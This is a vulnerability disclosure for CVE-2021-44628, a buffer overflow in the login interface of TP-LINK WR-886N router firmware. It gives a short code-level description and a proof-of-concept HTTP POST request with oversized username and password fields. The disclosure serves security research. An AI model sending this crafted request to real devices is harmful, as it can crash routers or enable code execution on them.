Headline
CVE-2021-44628: IoT_CVE/886N/loginRegister at main · Yu3H0/IoT_CVE
A Buffer Overflow vulnerabiltiy exists in TP-LINK WR-886N 20190826 2.3.8 in thee /cloud_config/router_post/login feature, which allows malicious users to execute arbitrary code on the system via a crafted post request.
TP-LINK WR-886N Vulnerability
This vulnerability is on the /cloud_config/router_post/login interface and affects the latest version of the router operating system (which is a different RTOS system from the linux operating system), and the firmware version is TL-WR886N V6.0 upgrade software 20190826 2.3.8
Vulnerability description
There is a buffer overflow vulnerability on the /cloud_config/router_post/login interface.
- An interface
/cloud_config/router_post/loginis registered first in the loginRegister function.
- In the handler, the v7 variable is the
usernamefield in the packet, and the v9 variable is thepasswordfield in the packet. Then directly memcpy to the a3 variable refers to the address space, there is a buffer overflow problem.
poc
POST /cloud_config/router_post/login HTTP/1.1
Host: 192.168.0.1
Content-Length: 717
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded;
Accept: */*
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&password=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Acknowledgment
Credit to @Yu3H0 ,@leonW7, @cpegg from Shanghai Jiao Tong University and TIANGONG Team of Legendsec at Qi’anxin Group.